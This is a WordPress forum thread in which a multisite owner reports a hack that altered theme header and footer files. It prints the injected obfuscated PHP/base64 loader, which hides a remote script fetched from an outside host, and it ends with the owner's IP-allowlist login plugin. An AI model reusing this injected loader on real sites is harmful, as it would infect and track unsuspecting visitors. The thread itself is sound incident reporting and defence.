My Multisite Network Sites got Hacked Again – How to Prevent

  • Resolved frank tredici

    (@frank13)


    9 years, 2 months ago

    All of my WPMS Network sites got hacked again. Last time it happened was through Gravity Forms so I totally deleted and deactivated all gravity forms across my network.

    This morning, at 04:39 AM ET, each of my sites and themes header.php and footer.php documents got altered.

    Here is what appears in one of them right after the <?php wp_head(); ?>

    <!--visitorTracker--><?php @ob_start();@ini_set("display_errors",0);@error_reporting(0);echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIGlkPSJpZF84MDA4NjQ5Ij4KdmFyIHZpc2l0b3
J0cmFja2VyaW4gPSBzZXRJbnRlcnZhbChmdW5jdGlvbigpewoJaWYoZG9jdW1lbnQuYm9keSAhPSBudWxsICYmIHR5cGVvZiBkb2N1bWVudC5ib2R5ICE9ICJ1bmRlZmluZWQiKXsKCQljbGVhckludGVydmFsKHZpc2l0b3J0cmFja2VyaW4pOwoJ
CWlmKHR5cGVvZiB3aW5kb3dbImdsb2JhbHZpc2l0b3IiXSA9PSAidW5kZWZpbmVkIil7CgkJCXdpbmRvd1siZ2xvYmFsdmlzaXRvciJdID0gMTsKCQkJdmFyIGlzSUUgPSB2aXNpdG9ydHJhY2tlcmRlKCk7CgkJCXZhciBpc0Nocm9tZSA9ICFpc0
lFICYmICEhd2luZG93LmNocm9tZSAmJiB3aW5kb3cubmF2aWdhdG9yLnZlbmRvciA9PT0gIkdvb2dsZSBJbmMuIjsKICAgICAgICAgIAlpZih2aXNpdG9yVHJhY2tlcl9pc01vYigpKXsKICAgICAgICAgICAgICB2YXIgdmlzaXRvcnRyYWNrZXJ2
cyA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpOyB2aXNpdG9ydHJhY2tlcnZzLnNyYyA9ICJodHRwOi8vc3BvcnRhbWUubmV0L3dwLWNvbnRlbnQvdGhlbWVzL2Rhc2hhdXNtdXNldW0vbGF5b3V0cy9jb21tb25fY29uZmlncy9pbm
RleC5waHA/bW9iPTEiOyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKHZpc2l0b3J0cmFja2VydnMpOwogICAgICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgICAgIGlmKChpc0lFICYmICFpc0No
cm9tZSAmJiAhdmlzaXRvclRyYWNrZXJfaXNNb2IoKSkpewoJCQkJCXZhciB2aXNpdG9ydHJhY2tlcnZzID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7IHZpc2l0b3J0cmFja2VydnMuc3JjID0gImh0dHA6Ly9zcG9ydGFtZS5uZX
Qvd3AtY29udGVudC90aGVtZXMvZGFzaGF1c211c2V1bS9sYXlvdXRzL2NvbW1vbl9jb25maWdzL2luZGV4LnBocCI7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCJoZWFkIilbMF0uYXBwZW5kQ2hpbGQodmlzaXRvcnRyYWNrZXJ2cyk7
CgkJCQl9IAogICAgICAgICAgICB9CgkJfQoJCXZpc2l0b3J0cmFja3NkZWwoKTsKCX0KfSwxMDApOwoKCmZ1bmN0aW9uIHZpc2l0b3J0cmFja3NkZWwoKXsKICAJLy9yZXR1cm47Cgl2YXIgY3Vyc2NpZCA9ICJpZF84MDA4NjQ5IjsKICAJaWYoY3
Vyc2NpZCAhPSAibm9uZSIpewogICAgIAl2YXIgY3NyID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoY3Vyc2NpZCk7CiAgICAgIAlpZih0eXBlb2YgY3NyICE9IHVuZGVmaW5lZCAmJiBjc3IgIT0gbnVsbCl7CiAgICAgICAgICAJY3NyLm91dGVy
SFRNTCA9ICIiOyAKCQkJZGVsZXRlIGNzcjsKICAgICAgICB9CiAgICB9Cn07CgpmdW5jdGlvbiB2aXNpdG9ydHJhY2tlcmRlKCkgewogICAgdmFyIHVhID0gd2luZG93Lm5hdmlnYXRvci51c2VyQWdlbnQ7CiAgICB2YXIgbXNpZSA9IHVhLmluZG
V4T2YoIk1TSUUgIik7CiAgICBpZiAobXNpZSA+IDApIHsKICAgICAgICByZXR1cm4gcGFyc2VJbnQodWEuc3Vic3RyaW5nKG1zaWUgKyA1LCB1YS5pbmRleE9mKCIuIiwgbXNpZSkpLCAxMCk7CiAgICB9CiAgICB2YXIgdHJpZGVudCA9IHVhLmlu
ZGV4T2YoIlRyaWRlbnQvIik7CiAgICBpZiAodHJpZGVudCA+IDApIHsKICAgICAgICB2YXIgcnYgPSB1YS5pbmRleE9mKCJydjoiKTsKICAgICAgICByZXR1cm4gcGFyc2VJbnQodWEuc3Vic3RyaW5nKHJ2ICsgMywgdWEuaW5kZXhPZigiLiIsIH
J2KSksIDEwKTsKICAgIH0KICAgIHZhciBlZGdlID0gdWEuaW5kZXhPZigiRWRnZS8iKTsKICAgIGlmIChlZGdlID4gMCkgewogICAgICAgcmV0dXJuIHBhcnNlSW50KHVhLnN1YnN0cmluZyhlZGdlICsgNSwgdWEuaW5kZXhPZigiLiIsIGVkZ2Up
KSwgMTApOwogICAgfQogICAgcmV0dXJuIGZhbHNlOwp9CmZ1bmN0aW9uIHZpc2l0b3JUcmFja2VyX2lzTW9iKCl7Cgl2YXIgdWEgPSB3aW5kb3cubmF2aWdhdG9yLnVzZXJBZ2VudC50b0xvd2VyQ2FzZSgpOwoJaWYoLyhhbmRyb2lkfGJiXGQrfG
1lZWdvKS4rbW9iaWxlfGF2YW50Z298YmFkYVwvfGJsYWNrYmVycnl8YmxhemVyfGNvbXBhbHxlbGFpbmV8ZmVubmVjfGhpcHRvcHxpZW1vYmlsZXxpcChob25lfG9kKXxpcmlzfGtpbmRsZXxsZ2UgfG1hZW1vfG1pZHB8bW1wfG1vYmlsZS4rZmly
ZWZveHxuZXRmcm9udHxvcGVyYSBtKG9ifGluKWl8cGFsbSggb3MpP3xwaG9uZXxwKGl4aXxyZSlcL3xwbHVja2VyfHBvY2tldHxwc3B8c2VyaWVzKDR8NikwfHN5bWJpYW58dHJlb3x1cFwuKGJyb3dzZXJ8bGluayl8dm9kYWZvbmV8d2FwfHdpbm
Rvd3MgY2V8eGRhfHhpaW5vL2kudGVzdCh1YSl8fC8xMjA3fDYzMTB8NjU5MHwzZ3NvfDR0aHB8NTBbMS02XWl8Nzcwc3w4MDJzfGEgd2F8YWJhY3xhYyhlcnxvb3xzXC0pfGFpKGtvfHJuKXxhbChhdnxjYXxjbyl8YW1vaXxhbihleHxueXx5dyl8
YXB0dXxhcihjaHxnbyl8YXModGV8dXMpfGF0dHd8YXUoZGl8XC1tfHIgfHMgKXxhdmFufGJlKGNrfGxsfG5xKXxiaShsYnxyZCl8YmwoYWN8YXopfGJyKGV8dil3fGJ1bWJ8YndcLShufHUpfGM1NVwvfGNhcGl8Y2N3YXxjZG1cLXxjZWxsfGNodG
18Y2xkY3xjbWRcLXxjbyhtcHxuZCl8Y3Jhd3xkYShpdHxsbHxuZyl8ZGJ0ZXxkY1wtc3xkZXZpfGRpY2F8ZG1vYnxkbyhjfHApb3xkcygxMnxcLWQpfGVsKDQ5fGFpKXxlbShsMnx1bCl8ZXIoaWN8azApfGVzbDh8ZXooWzQtN10wfG9zfHdhfHpl
KXxmZXRjfGZseShcLXxfKXxnMSB1fGc1NjB8Z2VuZXxnZlwtNXxnXC1tb3xnbyhcLnd8b2QpfGdyKGFkfHVuKXxoYWllfGhjaXR8aGRcLShtfHB8dCl8aGVpXC18aGkocHR8dGEpfGhwKCBpfGlwKXxoc1wtY3xodChjKFwtfCB8X3xhfGd8cHxzfH
QpfHRwKXxodShhd3x0Yyl8aVwtKDIwfGdvfG1hKXxpMjMwfGlhYyggfFwtfFwvKXxpYnJvfGlkZWF8aWcwMXxpa29tfGltMWt8aW5ub3xpcGFxfGlyaXN8amEodHx2KWF8amJyb3xqZW11fGppZ3N8a2RkaXxrZWppfGtndCggfFwvKXxrbG9ufGtw
dCB8a3djXC18a3lvKGN8ayl8bGUobm98eGkpfGxnKCBnfFwvKGt8bHx1KXw1MHw1NHxcLVthLXddKXxsaWJ3fGx5bnh8bTFcLXd8bTNnYXxtNTBcL3xtYSh0ZXx1aXx4byl8bWMoMDF8MjF8Y2EpfG1cLWNyfG1lKHJjfHJpKXxtaShvOHxvYXx0cy
l8bW1lZnxtbygwMXwwMnxiaXxkZXxkb3x0KFwtfCB8b3x2KXx6eil8bXQoNTB8cDF8diApfG13YnB8bXl3YXxuMTBbMC0yXXxuMjBbMi0zXXxuMzAoMHwyKXxuNTAoMHwyfDUpfG43KDAoMHwxKXwxMCl8bmUoKGN8bSlcLXxvbnx0Znx3Znx3Z3x3
dCl8bm9rKDZ8aSl8bnpwaHxvMmltfG9wKHRpfHd2KXxvcmFufG93ZzF8cDgwMHxwYW4oYXxkfHQpfHBkeGd8cGcoMTN8XC0oWzEtOF18YykpfHBoaWx8cGlyZXxwbChheXx1Yyl8cG5cLTJ8cG8oY2t8cnR8c2UpfHByb3h8cHNpb3xwdFwtZ3xxYV
wtYXxxYygwN3wxMnwyMXwzMnw2MHxcLVsyLTddfGlcLSl8cXRla3xyMzgwfHI2MDB8cmFrc3xyaW05fHJvKHZlfHpvKXxzNTVcL3xzYShnZXxtYXxtbXxtc3xueXx2YSl8c2MoMDF8aFwtfG9vfHBcLSl8c2RrXC98c2UoYyhcLXwwfDEpfDQ3fG1j
fG5kfHJpKXxzZ2hcLXxzaGFyfHNpZShcLXxtKXxza1wtMHxzbCg0NXxpZCl8c20oYWx8YXJ8YjN8aXR8dDUpfHNvKGZ0fG55KXxzcCgwMXxoXC18dlwtfHYgKXxzeSgwMXxtYil8dDIoMTh8NTApfHQ2KDAwfDEwfDE4KXx0YShndHxsayl8dGNsXC
18dGRnXC18dGVsKGl8bSl8dGltXC18dFwtbW98dG8ocGx8c2gpfHRzKDcwfG1cLXxtM3xtNSl8dHhcLTl8dXAoXC5ifGcxfHNpKXx1dHN0fHY0MDB8djc1MHx2ZXJpfHZpKHJnfHRlKXx2ayg0MHw1WzAtM118XC12KXx2bTQwfHZvZGF8dnVsY3x2
eCg1Mnw1M3w2MHw2MXw3MHw4MHw4MXw4M3w4NXw5OCl8dzNjKFwtfCApfHdlYmN8d2hpdHx3aShnIHxuY3xudyl8d21sYnx3b251fHg3MDB8eWFzXC18eW91cnx6ZXRvfHp0ZVwtL2kudGVzdCh1YS5zdWJzdHIoMCw0KSkpIHsKCQlyZXR1cm4gdH
J1ZTsKCX0KCXJldHVybiBmYWxzZTsKfTwvc2NyaXB0Pg==");?><!--visitorTracker-->
Viewing 1 replies (of 1 total)
  • Thread Starter frank tredici

    (@frank13)

    Given the .htaccess method for preventing login attacks does not work in WordPress Multi-site, here is the solution I came up with for anyone wishing to truly button down their WPMS Network:

    Step 1: create a script and upload it to ./wp-content/mu-plugins/. I called my script “loginBlocker.php“.

    Step 2: here is the loginBlocker.php script:

    <?php
/**
 * Plugin Name: WordPress Network Login Access & Control
 * Plugin URI: https://example.com/
 * Description: Login request intercept used on all sites in the network.
 * Version: 1.0
 * Author: F.Tredici
 * Author URI: https://example.com/ftredici/
 * License: GPLU
 */

function loginController_func() {

    $authorizedIPs = array(
        '123.456.789.012', // authorized user #1
        '987.654.321.098' // authorized user #2
    );

    if (!in_array($_SERVER['REMOTE_ADDR'], $authorizedIPs)) {
        wp_redirect( 'https://example.com/', 301 );
        exit;
    }

}
add_action('wp_authenticate', 'loginController_func'); // hook for wp-admin
add_action('login_init', 'loginController_func'); // hook for wp-login all actions
?>

    Step 3: simply add the IP Address(es) for your authorized login sources to the $authorizedIPs array() and you’ll have better “peace” of mind.

    Good luck and happy hacker-blocking.

Viewing 1 replies (of 1 total)
  • The topic ‘My Multisite Network Sites got Hacked Again – How to Prevent’ is closed to new replies.